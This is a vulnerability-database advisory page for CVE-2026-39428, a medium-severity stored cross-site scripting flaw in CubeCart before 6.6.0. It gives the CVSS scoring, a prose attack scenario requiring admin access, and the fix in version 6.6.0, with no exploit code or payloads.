Skip to main content

CubeCart CVE-2026-39428

| EUVD-2026-30157 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-05-13 GitHub_M
XSS V6
4.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
4.8 MEDIUM
AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jun 08, 2026 - 11:05 vuln.today
Patch available
May 13, 2026 - 22:03 EUVD

DescriptionGitHub Advisory

CubeCart is an ecommerce software solution. Prior to 6.6.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in CubeCart v6.x. An attacker with administrative privileges can inject malicious JavaScript payloads into multiple fields during the creation or modification of a product. These payloads are stored in the database and executed whenever a user (customer or another administrator) views the affected product pages, which could lead to session hijacking or unauthorized actions. This vulnerability is fixed in 6.6.0.

AnalysisAI

Stored Cross-Site Scripting in CubeCart v6.x (prior to 6.6.0) allows an authenticated administrator to inject persistent malicious JavaScript into product creation or modification fields, which then executes in the browsers of any user - customer or fellow administrator - who views the affected product pages. The attack requires high-privilege access (PR:H) and victim interaction (UI:R), limiting its realistic threat surface to compromised or malicious admin accounts. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Obtain or compromise CubeCart admin credentials
Delivery
Log into admin panel
Exploit
Inject JavaScript payload into product fields
Install
Payload stored in database
C2
Victim loads affected product page
Execute
Malicious script executes in victim browser
Impact
Exfiltrate session cookie or perform unauthorized action
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires that the attacker already holds a CubeCart administrative account with product creation or modification privileges (CVSS PR:H confirmed). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The overall risk is moderate-to-low in practice despite the network-accessible attack vector. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has obtained CubeCart administrative credentials - whether through credential theft, phishing, or a compromised admin account - navigates to the product management interface and injects a JavaScript payload (e.g., a cookie-stealing script) into a product's name, description, or another stored field. When a customer browses the product page, or another administrator views it in the admin panel, the script executes in their browser, exfiltrating session cookies to an attacker-controlled server and enabling session hijacking. …
Remediation The vendor-released patch is CubeCart 6.6.0, which resolves this vulnerability. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-39428 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy